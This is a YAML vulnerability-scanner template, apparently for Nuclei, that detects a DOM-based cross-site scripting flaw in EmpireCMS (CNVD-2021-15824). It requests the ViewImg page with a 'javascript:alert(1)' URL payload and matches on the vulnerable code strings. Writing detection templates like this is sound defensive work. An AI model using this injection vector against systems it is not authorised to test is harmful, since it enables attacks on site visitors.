id: CNVD-2021-15824 info: name: EmpireCMS DOM Cross Site-Scripting author: daffainfo severity: high description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. reference: - https://sourceforge.net/projects/empirecms/ - https://www.bilibili.com/read/cv10441910 - https://vul.wangan.com/a/CNVD-2021-15824 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 tags: empirecms,cnvd,cnvd2021,xss,domxss requests: - method: GET path: - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)" matchers-condition: and matchers: - type: word part: body words: - 'if(Request("url")!=0)' - 'href=\""+Request("url")+"\"' condition: and - type: status status: - 200 # Enhanced by mp on 2022/03/23